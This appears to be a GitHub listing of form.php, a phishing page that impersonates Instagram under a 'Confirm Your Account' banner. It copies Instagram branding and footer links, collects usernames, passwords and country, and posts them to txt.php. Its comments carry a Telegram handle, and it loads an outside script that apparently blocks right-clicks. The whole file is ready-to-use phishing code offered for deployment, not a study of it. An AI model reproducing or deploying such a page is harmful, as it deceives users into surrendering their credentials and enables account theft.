-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathform.php
50 lines (46 loc) · 2.42 KB
/
form.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=0">
<link rel="stylesheet" href="style.css">
<link rel="shortcut icon" href="https://www.freepnglogos.com/uploads/instagram-logo-png-transparent-0.png">
<title> Instagram </title>
</head>
<body>
<div class="header-ig"><div class="header-ig-text"><p class="header-ig-ig">Instagram</p><p class="header-ig-2"> Find for free on Google Play.</p></div>
<a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3D27C892C7-1B67-4BBA-ABFC-755E7134B0EE%26utm_content%3Dlo%26utm_medium%3DinstallLink"><button>GET</button></a>
</div> <!-- telegram @klaxgod -->
<center>
<div id="rgn" class="content">
<img src="https://i.hizliresim.com/nshihpg.png" width="200" id="klaxgod">
<br> <!-- telegram @klaxgod -->
<span> Confirm Your Account</span>
<form action="txt.php" method="post">
<input type="text" placeholder="Username" class="psikopatcoder" name="username" required>
<input type="password" placeholder="Password" class="psikopatcoder" name="password" required>
<input type="text" placeholder="Country" class="psikopatcoder" name="Country" required>
<select id="select"> <!-- telegram @klaxgod -->
<option value="Business Account">Business Account</option>
<option value="Fun">Fun</option>
<option value="Private">Private</option>
<option value="Trade">Trade</option>
<option value="Music">Music</option>
<option value="Orther">Orther</option>
</select> <!-- telegram @klaxgod -->
<input type="submit" value="Confirm Account" name="submit" id="butonck">
</form> <!-- telegram @klaxgod -->
</div>
<div id="footer">
<a href="https://www.instagram.com/about/us/"> ABOUT US </a>
<a href="https://help.instagram.com/"> HELP </a>
<a href="https://www.instagram.com/developer/"> API </a>
<a href="https://www.instagram.com/about/jobs/"> JOBS </a>
<a href="https://help.instagram.com/581066165581870"> TERMS</a>
<a href="https://help.instagram.com/519522125107875"> PRIVACY </a>
<p>© 2024 INSTAGRAM, INC. </p>
</div>
</center>
<script language="javascript" src="http://ir.sitekodlari.com/sagtusengelleme1.js"></script>
</body>
</html>